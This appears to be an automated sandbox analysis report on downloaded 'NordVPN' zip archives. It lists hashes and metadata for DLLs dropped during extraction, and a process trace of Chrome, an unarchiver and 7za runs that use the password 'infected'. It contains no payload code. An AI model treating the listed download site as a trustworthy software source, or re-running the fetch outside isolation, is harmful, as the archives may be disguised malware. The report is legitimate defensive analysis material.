                Size (bytes):34304
                Entropy (8bit):5.558328885229395
                Encrypted:false
                SSDEEP:768:T6MYFFpWIkYbvE+Ns9tH/5+tbsAUHxoDPny:TcMJYbs+Ns9tHc4O7y
                MD5:95BCEDC616E550AEC0F880E32C31523A
                SHA1:725A7DED4067DAE312E51ECD8349A56A86B08EE2
                SHA-256:A51A8895BCF18E81814875F165FEB8682C4A0174A51B6055E63B6420960737D9
                SHA-512:73E351EF9B77FFADAD4A4BD9E5C35D5D397FC200547894EE282E31A0F40457BAB8117C491023ABE84E246FD99F37FFABF11C22FED2BE360529BD76AE91E2629C
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):33792
                Entropy (8bit):5.603295378807862
                Encrypted:false
                SSDEEP:768:Wc+Ft8Z7/b5AF6Kr6HY5bMip0UVEBKeFZBKRcefCzgyHASeRRuH:r+r8zb5AwKr6HY5bMip0UVEBKeFZBKRm
                MD5:70311E6207D7C36A6F1927D1C32D846D
                SHA1:3E8F0CBED9DF0AEF98E07F7C13478BC1365C64A2
                SHA-256:6425663743C675ACBE8B30E019BB32A160F97A9F841001DA14451D55FFC16E42
                SHA-512:5B7C0E130323A59E4D862F58E3E8EF01EFCF266EB8CA3D038C376FC04009114E756C43278CFAC5452B5B4FE5F40BC35C3CB67F896D12A2662054299FC9A8418E
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):29696
                Entropy (8bit):5.503498109127301
                Encrypted:false
                SSDEEP:384:XGGtM1F13pSBxH+8Ggot8HXoRKsYLy6ssdLLb0ZtnLwkIy1HHYTM3edFuN01lfo:XDQK7JLBF19sZIy1HOgedINA2
                MD5:E782BBD99A2FC72793AA0EB0AE73876E
                SHA1:B85D11276E7BFF2A00EAD9A9CF06E4D395E3751D
                SHA-256:7E8CE1A5DEC3A389E63F9C522676794BB48401FE5CCA76EC2264926251046222
                SHA-512:651196BC21FBA072B40F49E2F0C5D1F73F161AEFD3ADBB8F61957F5D85B02A0E1FBED9AD2FA6FE3CBFF3438A312C678123C02ACAF013901FE293713388375524
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):37888
                Entropy (8bit):5.529896258227009
                Encrypted:false
                SSDEEP:384:ijJznnaD2J2oXPSirdi0xkU7074kL02q84bJj1CfDKhdFs2KJ0wAMSfo:idaa/lrd7TpLLHCfuhdGJJPAMV
                MD5:FE31FB2D6A856AE73E4C578B15968764
                SHA1:50E8C726FDD8125A23D5908551BCD5BC6B893E1B
                SHA-256:008E9B57CB29753687596F66907420FA060B65AF9002C6178FB9000B57F7D2CD
                SHA-512:4B91FB05E6270E8A847B7526DE2283D587ED544DEA5A50E301836078674F55CAC029273D54DDF314865CB8C41914F1ABFD96222974902F78065552F5179C268D
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):3696072
                Entropy (8bit):6.574865903829714
                Encrypted:false
                SSDEEP:49152:nqr33AJsOB8SLXId6mEjWEmNZMKRMbDhQc6555Rqp28ITdGS90tQhveWja37PLE3:nyUa6PcMbWD86dGZR
                MD5:6BC4ADA9A7CAB72F49C564E6C86B4C3E
                SHA1:F0FBA01542A0FBE585106F7EFD884DF65E8C89DC
                SHA-256:7D0D1290382EA0E44A3178446A0C202696237E27DBB5F8F0827691092B8F2228
                SHA-512:D7EC39514C104B40A42CD3CA956BA84F5A78F237A39F40D85BA54983145BCE2DFBC7EC5E0CBC1BF8AB64D1D370371A7CBA5E30202D2C1F37782DB32486ED7F6E
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):6815232
                Entropy (8bit):6.585131476726344
                Encrypted:false
                SSDEEP:98304:svCLSaeGBz4bhRCxWq+xFidpWuIwhU3Vs/G0AbWPOPl+YI8+DIj:LeGBz4SxWVxqpWpwhUlGG0AyOF+Uj
                MD5:416916F39B32EAC6FFF9A89CF8D88507
                SHA1:99FC405EBE8BF11C0BE99E456B3A28ABCED23ECF
                SHA-256:AE1AA860928AF12EFF059AA03545047DB95F3E1D9EAA35814F176D6813CFE564
                SHA-512:48A52CAC407E9F3EEA64476BBC51BDCC29EC443A92256982A9D96347EE109FC54FAAE45316208FF5A815F287B72F822A8320F3DD8274D5BF21B1AF0181D176C6
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):43520
                Entropy (8bit):5.750942246728526
                Encrypted:false
                SSDEEP:768:fSLFjozWctd2cu+82Mmo8wRl+jCilQRpz9:e1ctdfu+8dmoR+jCil+l9
                MD5:3EC43B84EAAE400B9DDA1FA69200B50D
                SHA1:8A73B0BFF797BBE8A91D9ED4542D4F045935F455
                SHA-256:2DC4BD956D3C3FB6F052360C43DD301E0B2B4786242CFA5DD730B6D512427CC1
                SHA-512:A73D6C1B0DBB1C465D2B83B0E0379FF081B685A42D4C20E8BEEB0D97C96B9B27BFEA916F1AC928257E04C5EF41FBCC75F8DF8ADD4AADF470A3AEF84933E64843
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):5714248
                Entropy (8bit):6.788288927588834
                Encrypted:false
                SSDEEP:98304:XETWMdQ1hV9M5wnx+49cRtvw7gVSOFld6QHJXJTHSewUgvhiWaOuBu3Cb+tbMTy2:XVVK58x+NRtomSuldtHJhyyb+tbM1
                MD5:21CB25B78EE9D4E2D651C600BA2BE2A3
                SHA1:E3BC20EE47633D06427015C07906DE925DB0B5DD
                SHA-256:75330E04960E72EEE106671CEEC9BD768E91DE1944CAFD402AAF7422C4BD7B39
                SHA-512:8CAB7A1FBA7FE8E6FF286B763504E18A9B465FACFE4D0F3A1FDFC06129885BE1535225FF99FEBFCD37C638291662D7BEB1E40F5C27391CE8ECE5317131AEBCCF
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):6732104
                Entropy (8bit):6.774431303294623
                Encrypted:false
                SSDEEP:196608:8xD1n+MwOPY6cikEpFjAOlYFOaEsZNros0aUh:8LgOPY6cikEz7TINr1G
                MD5:714CDAC1D60200AF009AB20403A18D34
                SHA1:BEF10479C60E9244C0205F31806F0E622532569C
                SHA-256:C9C4BA9D27734D3FF60D18ECCF883EE54AE3CD2ECE4F7048C56C9C1FF707B931
                SHA-512:CF503253E0A0A6DB7D9F73A2B2309D3A274154F5B665EE5642E350BFEDCD6193E2875D23CEEA621DC8918DB9494FDD20E94ABF160E6EDBE12444673C0F54B72C
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):43008
                Entropy (8bit):5.210468478228683
                Encrypted:false
                SSDEEP:768:tvmmXbYjsGU+YOH3qfakgZq+MmajKUk/ymmw85LBX5Ax1msgM9:bYoMxH3q5gZq+MmajKUk/ymmwSooM9
                MD5:1094025888EEBA683FE8BE2406BA35B7
                SHA1:9A4C8F5BA8DB47B08902596A1E57FA38499E0BA0
                SHA-256:F8CAAD263F0CB985E882461E4D2FDA31AF21900D1366A3BC84161906E6E1C4E2
                SHA-512:EC2947A48ABB6BC36EFA2AA8BCED287BBA56A5CEA8FE848817BB87861528B889888A01EB18A47B4EC9FBD7C3EF341E92255A264297DB6360B48860272F1FA3CC
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):42496
                Entropy (8bit):5.78491146496519
                Encrypted:false
                SSDEEP:768:JCluSBbTdHR6bWVp2DNf9gFN/bUER+guYuYV858UNdHY:ZcdHR6bipiNmFN/bUER/8YVK5Y
                MD5:EBE73E3869EF5A7121BB75805D08CBBA
                SHA1:5BB3208D3D2811D7DDDFF7AE4FD9BEB71F8A8472
                SHA-256:31299BAEDEC57D2190B876683F56B49820F62BC61C34414658DDF28734D6F97E
                SHA-512:116A0E02F09113D9656A16601D939FB90F5AB03B54758F5EC7CF4F96AA0FFA3730A5BA0CE67E3E4E8C38B49726176A3B4DF23FC0AAB439E88CD161CD9B2247D0
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):45568
                Entropy (8bit):5.858231359538286
                Encrypted:false
                SSDEEP:768:wDqUCO+QSIRYqvceJqiq7z/rO5rHo4NZUkQ/EftxED0WP1:iqZQS1qvjJeLrz4ZUHqPg5P1
                MD5:5B464DBB845244F197C17915C4F2E8EA
                SHA1:98D64023BCB7F5033F8E7ED4130721EEB3289841
                SHA-256:6CF066F862E88F8018A08061CA9559EB942E6143914A7F0FFF750DF2C12896CC
                SHA-512:2F173B990A7EC18EBD7E74BE5C530143A44E692A0A04D5C915543054547FA33DA02CF7FB2255F591AAE0F6978CD944FD413DEAD53F01A4AFD0F8A13ADEAA6CA5
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):40960
                Entropy (8bit):5.676630719140105
                Encrypted:false
                SSDEEP:384:L3YIuZKPWWwOXCL7JsusoeUjG7mOUS5JnRAbO9a5y/UKbxHVPM4Yc130rwwzmHVH:jYIwKeWat3jhOUy3PU+WwkqNyT2p
                MD5:1887719113516BDA4EA8F88F50B96234
                SHA1:0133645583F3F5B517E20E672FDD5E506A827C8D
                SHA-256:269DBA44DD14816208848931DFCEB4263E6E8C4C0492607E441C365AB665000E
                SHA-512:BB6F9B47C53BFF70588B81761405F106252A216F3F98C8AA95BE75BCCCBF66CBC1E6CB0D473F0B27D4F572244E6B32AC352BF85BB5F6EDED861775DB5215357B
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):39424
                Entropy (8bit):5.630575990216515
                Encrypted:false
                SSDEEP:768:m6eTa8ZV5zru0vyXMpykQwS7kCfmlI/TugbeJ/dMZ:iTNeeCxkpLCfmS/T2NqZ
                MD5:093DA71B48331B1786B39F6BA9032439
                SHA1:5017627C9F08F3C8D03986BDC5163A58E296FC46
                SHA-256:8BA07861C4CEB06210CF181C1F523E81F44405772AB1A1DC423BCB40F3A50983
                SHA-512:FF168537AB847A196FAB501F82C3707D245F83C7436FE1CA984F10FA3FFD9B5FD9B743D0B145CC1D4DD79F71F565A960A9249A11035BF216485A9C5BB67F612B
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):45568
                Entropy (8bit):5.793348426727689
                Encrypted:false
                SSDEEP:768:WluAyGXOMYy0kwdRrrN0T3uiSRUSE6l14eEZg:PAyGXOdy0kwdATmRU7w1Sg
                MD5:DCEF8994E6BF5230C62F01C48753DBAF
                SHA1:081698122A23D261AAB1C9BE973EF9A9AA63539E
                SHA-256:80C2236AB7AC3DAB6677EFB63ADA6E25544507933F869BEF0DEA4BC242BA819F
                SHA-512:859EEAA3488AA665D889E306B3B0913CA12306CC53790BA0553587BCF6C16F32D7D5B14493241A6477C02D46F01B8D02FD5ED1F6CCAFF1129228B435D353C47F
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):39424
                Entropy (8bit):5.703620844148914
                Encrypted:false
                SSDEEP:768:rm2CGmWkgA3KNCV5oXYHvaDu/hoSG66GfqYNRhuTHvna6/J8kfr:rmemR0XYHvaq/hoSH6GfqYNRhuTHvRm8
                MD5:F2CD74A1B3582B1B318D46ADFC19CB6B
                SHA1:D1FCC9909CEBFFF96125EBACF4932AC90E448126
                SHA-256:12BD68CA5F1CC46D4861B77DA3BAEB5BA45A7A4E86E891AC372BCF8E182E757B
                SHA-512:D78E989DF7C9007CEEE00D1F3BFF61BF04A48C3D658A0D50F4BA832F35E9F86E5A6C19440955453402DE5F1EA174716214DC900CF76A9BE5AFCA10B9C9686199
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):4691608
                Entropy (8bit):6.765525525116327
                Encrypted:false
                SSDEEP:49152:kxvv6zzXjo5ssBNM8kJ64j06ZlhmQkmzxlxixkRCtaCFqdu2qduSuVqpy9uVqpyV:k56zzXjo5ssBNM8kJ60087osjSbyv0
                MD5:8EE3EF186A0D17275AC3AE664236BF34
                SHA1:27A0AF02857C2E3920FE7E46DCCB747B0B4759BD
                SHA-256:717FB849F88DA5D76EDA13A5350BBCC77F14F472DFC5E6CD855A757605A6C651
                SHA-512:FD6D90102E24BD43E07C99105E0B1B050F8AC614EA1D653ACA4D9354EF3B0A8D7C63C6D5C379F6C07D278560EE0FA47FB829F516BF1579FE5FA29F86A9AE6E0E
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):45056
                Entropy (8bit):5.466591180388901
                Encrypted:false
                SSDEEP:768:bKSldNwNu2rofQpdZ+6O1GC8DpEt7c5aMyU6/JQd/os0it26Wy1j7nyyyEMpyYya:bpNjuofQpi6OB8DpEt7c5aMyU6/JQd/C
                MD5:FF69429C947D58C88CAB91854351E0F5
                SHA1:AFA2BA365C6AD716444532642001007483326A96
                SHA-256:33A79BDBAEE97491911CC90F0906DEC084E64627B0D890377112ED3DAFA226CA
                SHA-512:B64C405E905BB11C786164FDBFDBA354D3C79F6DA1CBF5028656688CE0B6A10BE360CAEA2B754F297062AD1114EB1010DFFCED505E7E66C08E503224A6A453C3
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):40448
                Entropy (8bit):5.524447114499072
                Encrypted:false
                SSDEEP:768:XWOWTtnfVml3fNsMV9ugmAglM+efX9stlxJIaU:XwtfVq3KK9lmAgl4XUj+aU
                MD5:18B712E99BB45D3D535CE800AC1F7294
                SHA1:BB03E7BE212B3A9BBD6F0303C43628D7F5AF77A5
                SHA-256:7147DDCBCC2F4B059B21CC9ADFC9670A7374EB4A230FDF09D1D0FFC4BFA954AC
                SHA-512:44A4D7B2997D076713F47411093E8577C9F88B4EA2494B1694A3EF05B33CD6CF69D7A571103EF5B38A6CBB47D522B34466C05634373E898F59D2EDE256739E48
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                Process:C:\Windows\SysWOW64\7za.exe
                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                Category:dropped
                Size (bytes):39424
                Entropy (8bit):5.601024353373893
                Encrypted:false
                SSDEEP:384:F3bhoX7/rGXONHMbC+KIs6iW+xUVVjdb5PtPZyGHwyj6bGsDbxHK+xzkdtORuIWF:ArieN0C+kxUJ5JIZB34J19woY3sL
                MD5:D39AAF3DFDB356EC1B0D693971FEB8EA
                SHA1:09CA52010706B9555BD8C58EBE861A96376D9B91
                SHA-256:AA7CE116903605F686652750445DB30DFD9E628A77E2F03D83857351565A3088
                SHA-512:1084D1481A6CF7A307F8D072D019D80816C475820135BA310D1F3504189C41F9D1D7ED705212B1DD5438729F9CA0B5303170B1A1B16946C3AA580A541208EC0C
                Malicious:false
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 0%
                Reputation:low
                No static file info
                No network behavior found


                Target ID:0
                Start time:00:07:20
                Start date:30/11/2022
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank
                Imagebase:0x7ff683680000
                File size:2851656 bytes
                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:1
                Start time:00:07:21
                Start date:30/11/2022
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=1952 --field-trial-handle=1816,i,5108959396523626248,12215149392874120257,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationTargetPrediction /prefetch:8
                Imagebase:0x7ff683680000
                File size:2851656 bytes
                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:2
                Start time:00:07:22
                Start date:30/11/2022
                Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                Wow64 process (32bit):false
                Commandline:C:\Program Files\Google\Chrome\Application\chrome.exe" "https://vpn-get.com/nordvpn
                Imagebase:0x7ff683680000
                File size:2851656 bytes
                MD5 hash:0FEC2748F363150DC54C1CAFFB1A9408
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:5
                Start time:00:08:24
                Start date:30/11/2022
                Path:C:\Windows\SysWOW64\unarchiver.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-10_11.zip
                Imagebase:0x7b0000
                File size:12800 bytes
                MD5 hash:B89F9ADB5A6E465B6EB4575913CD2687
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:low

                Target ID:6
                Start time:00:08:27
                Start date:30/11/2022
                Path:C:\Windows\SysWOW64\7za.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\boe55dv2.gbx" "C:\Users\user\Downloads\NordVPN-10_11.zip
                Imagebase:0x1390000
                File size:289792 bytes
                MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:7
                Start time:00:08:27
                Start date:30/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:8
                Start time:00:09:09
                Start date:30/11/2022
                Path:C:\Windows\SysWOW64\unarchiver.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\SysWOW64\unarchiver.exe" "C:\Users\user\Downloads\NordVPN-7_8.zip
                Imagebase:0x9c0000
                File size:12800 bytes
                MD5 hash:B89F9ADB5A6E465B6EB4575913CD2687
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:.Net C# or VB.NET
                Reputation:low

                Target ID:9
                Start time:00:09:12
                Start date:30/11/2022
                Path:C:\Windows\SysWOW64\7za.exe
                Wow64 process (32bit):true
                Commandline:C:\Windows\System32\7za.exe" x -pinfected -y -o"C:\Users\user\AppData\Local\Temp\wgjorgwf.g2l" "C:\Users\user\Downloads\NordVPN-7_8.zip
                Imagebase:0x1390000
                File size:289792 bytes
                MD5 hash:77E556CDFDC5C592F5C46DB4127C6F4C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                Target ID:10
                Start time:00:09:12
                Start date:30/11/2022
                Path:C:\Windows\System32\conhost.exe
                Wow64 process (32bit):false
                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Imagebase:0x7ff7c72c0000
                File size:625664 bytes
                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low

                No disassembly